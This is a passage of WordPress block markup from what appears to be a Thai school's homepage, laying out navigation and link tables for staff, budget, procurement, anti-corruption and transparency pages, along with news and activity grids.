class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab 